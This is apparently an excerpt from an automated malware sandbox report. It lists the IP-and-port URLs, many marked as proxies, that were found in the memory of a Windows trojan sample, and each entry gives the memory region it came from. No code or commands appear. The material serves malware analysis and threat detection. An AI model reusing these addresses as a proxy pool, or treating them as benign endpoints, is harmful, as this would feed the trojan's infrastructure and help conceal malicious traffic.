                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CA72F000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CA6DF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://94.23.83.53:64305
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CA6DF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://94.23.83.53:64305://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CBDF0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://94.23.83.53:64982
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CBDF0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://94.23.83.53:64982://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CCD0D000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C95F6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://94.23.83.53:8943
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C95F6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://94.23.83.53:8943://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C95F6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://94.23.83.53:8960
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C95F6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://94.23.83.53:8960://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CB377000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C6231000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://94.231.192.97:8080
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CB377000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://94.231.192.97:8080://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C715C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://94.232.11.178:58028
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C715C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://94.232.11.178:58028://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CCD0D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://94.241.173.37:8080
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CCD0D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://94.241.173.37:8080://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C9FF6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://94.247.208.16:8123
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C9FF6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://94.247.208.16:8123://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C7981000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://94.250.250.154:3128
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C7981000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://94.250.250.154:3128://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C95F6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://94.26.241.120:8080
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C95F6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://94.26.241.120:8080://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CB377000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://94.30.152.172
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CB125000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://94.30.152.172://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C6480000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://94.40.127.166:4145
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C6480000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://94.40.127.166:4145://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C854A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://94.45.74.6:8080
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C854A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://94.45.74.6:8080://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C6577000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CBDA5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://94.73.239.124:55443
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C6577000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://94.73.239.124:55443://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CD1F3000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CA7A7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://94.73.251.19:1080
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CA7A7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://94.73.251.19:1080://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C8070000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://94.74.120.192:443
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C66E1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://94.74.120.192:443://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C9FF6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://94.75.76.3:8080
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C9FF6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://94.75.76.3:8080://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C9FF6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://95.106.133.43:8080
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C9FF6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://95.106.133.43:8080://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C854A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://95.111.226.235:3128
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C7981000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://95.111.226.235:3128://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C854A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://95.111.227.164:46295
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C854A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://95.111.227.164:46295://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CCD0D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://95.111.227.164:62852
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CCD0D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://95.111.227.164:62852://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CBDD7000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CAE42000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://95.111.227.164:9825
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CAE42000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://95.111.227.164:9825://proxyx
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C70EF000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C7069000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://95.143.12.201:60505
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C70EF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://95.143.12.201:60505://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C6A99000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://95.158.174.111:8080
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C6A99000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://95.158.174.111:8080://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CCD0D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://95.158.179.216:32799
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CCD0D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://95.158.179.216:32799://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CB377000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://95.163.79.3:3128
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CB377000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://95.163.79.3:3128://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CA801000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CA7FB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://95.165.129.55:8833
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CA7FB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://95.165.129.55:8833://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C9FF6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://95.165.163.188:36496
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C9FF6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://95.165.163.188:36496://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CB377000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://95.179.155.218:8080
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CB377000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://95.179.155.218:8080://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CBBA6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://95.188.82.147:3629
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CBBA6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://95.188.82.147:3629://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C7981000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://95.215.161.7:8080
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C7981000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://95.215.161.7:8080://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C7981000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://95.216.108.17:3128
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C7981000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://95.216.108.17:3128://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C95F6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://95.216.146.2:8328
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C95F6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://95.216.146.2:8328://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CB377000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://95.216.17.79:3888
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CB377000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://95.216.17.79:3888://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C715C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://95.216.201.74:1080
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C715C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://95.216.201.74:1080://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C7981000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://95.216.230.239
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C7981000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://95.216.230.239://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C7981000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://95.216.230.239:80
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C715C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://95.216.94.103:3128
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C715C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://95.216.94.103:3128://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CB125000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://95.217.104.21:24815
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C7069000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://95.217.104.21:24815://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CAB2F000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C95F6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://95.217.137.46:8080
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C95F6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://95.217.137.46:8080://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CB377000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C7DA8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://95.217.187.170:45238
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CB377000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://95.217.187.170:45238://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C9FF6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://95.217.187.170:49195
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C9FF6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://95.217.187.170:49195://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CB125000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://95.217.195.146:9999
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CB125000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://95.217.195.146:9999://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CB377000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://95.31.5.29:51528
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CB377000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://95.31.5.29:51528://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C7F92000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://95.43.244.15:4153://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C7F66000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://95.43.244.15:4153x
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CB346000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CB377000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://95.47.119.122:8080
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CB346000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://95.47.119.122:8080://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CB377000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://95.56.254.139:3128
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CB377000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://95.56.254.139:3128://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C854A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://95.67.79.254:8080
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C7F21000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://95.67.79.254:8080://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C854A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://95.70.220.173:4153
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C854A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://95.70.220.173:4153://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C95F6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://95.81.87.148:8080
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C95F6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://95.81.87.148:8080://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C95F6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://95.87.30.11:8080
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C95F6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://95.87.30.11:8080://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C64DA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://96.113.158.126
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C64DA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://96.113.158.126://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CBCE5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://96.113.159.162
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CC5FF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://96.113.159.162://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CC5FF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://96.113.159.162:80
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CB377000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://96.114.36.9
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C95F6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://96.114.36.9://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CB125000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://96.114.36.9:80
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C677C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://96.36.50.99:39593
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C677C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://96.36.50.99:39593://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CCD0D000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C854A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://96.70.52.227:48324
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C854A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://96.70.52.227:48324://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CB377000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://96.80.235.1:8080
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CB377000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://96.80.235.1:8080://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C6A99000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CD140000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://96.9.77.71:51080
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CBCFC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://96.9.77.71:51080://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C7981000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://96.9.86.70:53304
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C7981000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://96.9.86.70:53304://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C854A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://97.74.233.206:30201
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C854A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://97.74.233.206:30201://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C95F6000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CD140000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://97.79.238.251:32016
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CD140000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://97.79.238.251:32016://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C6F32000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://97.79.238.253:5699
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C6F32000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://97.79.238.253:5699://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C759F000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C715C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://97.79.238.65:48576
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C715C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://97.79.238.65:48576://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C7981000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://98.162.25.23:4145
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C7981000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://98.162.25.23:4145://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CA2DA000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C853A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://98.162.25.29:31679
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CA2DA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://98.162.25.29:31679://proxy
